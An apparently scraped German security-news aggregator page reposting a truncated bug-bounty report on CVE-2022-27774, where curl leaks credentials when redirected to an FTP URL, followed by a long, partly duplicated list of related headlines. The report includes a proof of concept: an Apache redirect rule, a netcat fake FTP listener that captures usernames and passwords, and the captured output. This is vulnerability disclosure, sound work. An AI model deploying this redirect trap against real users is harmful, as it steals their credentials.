Ausnahme gefangen: SSL certificate problem: certificate is not yet valid ๐Ÿ“Œ Internet Bug Bounty: CVE-2022-27774: Credential leak on redirect

๐Ÿ  Team IT Security News

TSecurity.de ist eine Online-Plattform, die sich auf die Bereitstellung von Informationen,alle 15 Minuten neuste Nachrichten, Bildungsressourcen und Dienstleistungen rund um das Thema IT-Sicherheit spezialisiert hat.
Ob es sich um aktuelle Nachrichten, Fachartikel, Blogbeitrรคge, Webinare, Tutorials, oder Tipps & Tricks handelt, TSecurity.de bietet seinen Nutzern einen umfassenden รœberblick รผber die wichtigsten Aspekte der IT-Sicherheit in einer sich stรคndig verรคndernden digitalen Welt.

16.12.2023 - TIP: Wer den Cookie Consent Banner akzeptiert, kann z.B. von Englisch nach Deutsch รผbersetzen, erst Englisch auswรคhlen dann wieder Deutsch!

Google Android Playstore Download Button fรผr Team IT Security



๐Ÿ“š Internet Bug Bounty: CVE-2022-27774: Credential leak on redirect


๐Ÿ’ก Newskategorie: Sicherheitslรผcken
๐Ÿ”— Quelle: vulners.com


image
Summary: curl/libcurl can be coaxed to leak user credentials to third-party host by issuing HTTP redirect to ftp:// URL. Steps To Reproduce: Configure for example Apache2 on firstsite.tld to perform redirect with mod_rewrite: RewriteCond %{HTTP_USER_AGENT} "^curl/" RewriteRule ^/redirectpoc ftp://secondsite.tld:9999 [R=301,L] Capture credentials at secondsite.tld for example with: while true; do echo -e "220 pocftp\n331 plz\n530 bye" | nc -v -l -p 9999; done curl -L --user foo https://firstsite.tld/redirectpoc The entered password is visible in the fake FTP server: Listening on 0.0.0.0 9999 Connection received on somehost someport USER foo PASS secretpassword There are several issues here: 1. The credentials are sent to a completely different host than the original host (firstsite.tld vs secondsite.tld). This is definitely not what the user could expect, considering the documentation says: When authentication is used, curl only sends its credentials to the initial host. If a redirect takes curl to a different host, it will not be able to intercept the user+password. See also --location-trusted on how to change this. 2. The redirect crosses from secure context (HTTPS) to insecure one (FTP). That is the credentials are unexpectedly sent over insecure channels even when the URL specified is using HTTPS. In addition, TLS SRP user credentials (CURLOPT_TLSAUTH_USERNAME and CURLOPT_TLSAUTH_PASSWORD) are also leaked on redirects. Impact Leak of confidential... ...



๐Ÿ“Œ Internet Bug Bounty: Open Redirect Vulnerability in Action Pack


๐Ÿ“ˆ 28.27 Punkte

๐Ÿ“Œ Internet Bug Bounty: Cookie headers are not cleared in cross-domain redirect in undici-fetch


๐Ÿ“ˆ 28.27 Punkte

๐Ÿ“Œ Internet Bug Bounty: Proxy-Authorization header is not cleared in cross-domain redirect in undici


๐Ÿ“ˆ 28.27 Punkte

๐Ÿ“Œ [Bug Bounty Hacker] Yahoo Bug Bounty Program 2016 - Sender Spoofing Vulnerability


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ Ebay Inc Bug Bounty Magento Commerce Bug Bounty - Persistent Cross Site Scripting Vulnerability


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ Naked Security Live โ€“ When is a bug bounty not a bug bounty?


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ Bug Bounty Field Manual: The Definitive Guide for Planning, Launching, and Operating a Successful Bug Bounty Program


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ Bug Bounty Field Manual: The Definitive Guide for Planning, Launching, and Operating a Successful Bug Bounty Program


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ Fear and hacking on the bug bounty trail: write up of Atlassian's first (Bugcrowd) Bug Bounty event in Sydney


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ Bug Bounty Platforms [Best Choices For a Bug Bounty Program]


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ Bug Bounty Benefits | Why You Need a Bug Bounty Program


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ Google-Dorks-Bug-Bounty - A List Of Google Dorks For Bug Bounty, Web Application Security, And Pentesting


๐Ÿ“ˆ 27.85 Punkte

๐Ÿ“Œ curl: Credential leak on redirect


๐Ÿ“ˆ 27.35 Punkte

๐Ÿ“Œ Internet Bug Bounty: CVE-2024-2398: HTTP/2 push headers memory-leak


๐Ÿ“ˆ 26.34 Punkte

๐Ÿ“Œ Internet Bug Bounty: Leak of sensitive values to Airflow rendered template


๐Ÿ“ˆ 25.15 Punkte

๐Ÿ“Œ Facebook Bug Bounty - Redirect Web Vulnerabilities


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ PayPal Bug Bounty #65 CN - Redirect Web Vulnerability


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ Facebook Mobile Bug Bounty #7 - Redirect Vulnerability


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ Paypal Bug Bounty #34 - Redirect Web Vulnerability


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ Prezi Bug Bounty #5 - CS Cross Site & Redirect Vulnerability


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ Prezi Bug Bounty #5 - CS Cross Site & Redirect Vulnerability


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ Facebook Bug Bounty - Redirect Web Vulnerabilities


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ PayPal Bug Bounty #65 CN - Redirect Web Vulnerability


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ Facebook Mobile Bug Bounty #7 - Redirect Vulnerability


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ Paypal Bug Bounty #34 - Redirect Web Vulnerability


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ Facebook Bug Bounty - Redirect Web Vulnerabilities


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ PayPal Bug Bounty #65 CN - Redirect Web Vulnerability


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ Facebook Mobile Bug Bounty #7 - Redirect Vulnerability


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ Paypal Bug Bounty #34 - Redirect Web Vulnerability


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ Prezi Bug Bounty #5 - CS Cross Site & Redirect Vulnerability


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ Prezi Bug Bounty #5 - CS Cross Site & Redirect Vulnerability


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ Facebook Bug Bounty - Redirect Web Vulnerabilities


๐Ÿ“ˆ 23.61 Punkte

๐Ÿ“Œ PayPal Bug Bounty #65 CN - Redirect Web Vulnerability


๐Ÿ“ˆ 23.61 Punkte











matomo